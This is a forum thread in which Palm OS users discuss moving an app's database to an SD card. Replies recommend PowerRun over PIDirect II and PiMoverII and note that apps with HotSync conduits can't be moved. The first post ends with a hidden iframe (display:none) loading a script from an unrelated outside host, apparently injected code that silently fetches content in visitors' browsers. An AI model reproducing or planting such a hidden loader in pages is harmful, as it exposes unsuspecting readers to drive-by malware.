+ Reply to Thread

Moving DB's to Card

I have this application DayNotez that I am trying. It's kind of a daily journal thing that resides on the Palm side and in Outlook as a folder. You can enter stuff on either side and it sync's both ways. Just what I needed.

Anway, because it keeps a daily note I'm thinking sooner or later memory on the Palm side is going to become an issue. I tried to just move the db file to the SD card but no luck. I'm wondering if anyone has some advice on the ways to move it there or is this just application specific and this won't work. Any help would be appreciated.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I use power run. It's a great app for maping applications to the memory card and fooling the app to think it's still on the plam

http://www.palmgear.com/software/sho...m?prodID=15870

Originally posted by HoTSynC
    I use power run. It's a great app for maping applications to the memory card and fooling the app to think it's still on the plam

http://www.palmgear.com/software/sho...m?prodID=15870
    Doesn't PIDirect II do the same thing ? I havn't used either and I was wondering the difference and which one you guys prefer ?

thanks.

Most excellent. I D/L'd it and it's working like a charm. Funny how the delay to load thing works. I giess it needs time to do it's thing.
    Thanks for your help and the info, looks like between the 2 app's I've spent some dough today.

Originally posted by babacksh
    Doesn't PIDirect II do the same thing ? I havn't used either and I was wondering the difference and which one you guys prefer ?

thanks.
    Actually while waiting for a reply I did stumble on a thread that talked about PIDirect II. went to the site and found that they have an app called PIMoverII which moves apps to the card. I d/l'd it and moved the app and db to the card I was working with and it never showed on the Palm. I tried to move just the db and it never showed on the Palm. Once HotSync gave me the lead on Power Run it worked first time. Out with PiMoverII and in with Power Run.

This doesn't mean PiMoverII doesn't work it may, just that I couldn't get it to here.

PowerRUN is awesome...

Thanks for the heads up for this program. It works so much better than PIDirect. May not have as many bells and whistles, but simplicity is better geared for the Palm OS anyway, right?

I set it up and moved tons of stuff to the card and freed up much needed space.

thanks again

Spoke to soon. I've been away for a few days and when I got back I tried to sync all the memo's from this program (see first post) on the phone to the desktop application. Seems once I move the db to the card (which works on the Palm side) the sync. conduit doesn't know where it is anymore and gives me an error message saying the program isn't on the phone? Geez... if it ain't ant's it cockraoches. Any ideas?

Yeah, you can't move things that have a conduit (e.g. address book, etc).

Originally posted by HoTSynC
    Yeah, you can't move things that have a conduit (e.g. address book, etc).
    I was afraid of that. So I guess unless they write the program to be loaded to the disk I'm s.o.l. Thanks